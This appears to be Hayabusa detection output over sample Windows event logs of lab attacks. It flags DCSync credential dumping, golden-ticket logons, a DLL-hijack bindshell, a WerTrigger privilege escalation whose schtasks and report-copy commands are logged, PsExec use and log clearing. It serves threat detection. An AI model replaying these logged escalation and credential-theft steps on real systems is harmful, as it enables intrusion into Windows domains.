2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx
2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx
2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx
2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx
2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
2020-09-09 22:18:23.627 +09:00,MSEDGEWIN10,4625,low,Logon Failure - Wrong Password,User: IEUser : Type: 2 : Workstation: MSEDGEWIN10 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd8f6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
2020-09-09 22:18:27.714 +09:00,MSEDGEWIN10,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: MSEDGEWIN10 : IP Address: - : Port: - : LogonID: 0x1cd964 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx
2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
2020-09-11 02:48:47.077 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx
